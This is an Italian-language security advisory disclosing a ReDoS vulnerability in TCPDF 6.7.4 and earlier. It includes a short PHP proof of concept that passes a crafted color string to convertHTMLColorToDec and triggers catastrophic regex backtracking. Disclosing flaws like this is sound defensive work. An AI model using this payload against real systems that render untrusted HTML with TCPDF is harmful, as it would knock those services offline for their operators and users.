
Denial of Service tramite espressione regolare (ReDoS)
TCPDF <= 6.7.4
L'analisi del colore HTML in TCPDF contiene un payload appositamente predisposto.
TCPDF versione <= 6.7.4 è vulnerabile a ReDoS (Denial of Service tramite espressione regolare) se analizza una pagina HTML non attendibile con un colore appositamente predisposto.
<?php
require_once('../tcpdf.php');
$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>
Nota: Controllando con preg_last_error() dopo la riga di codice vulnerabile, il regEx uscirà con PREG_BACKTRACK_LIMIT_ERROR.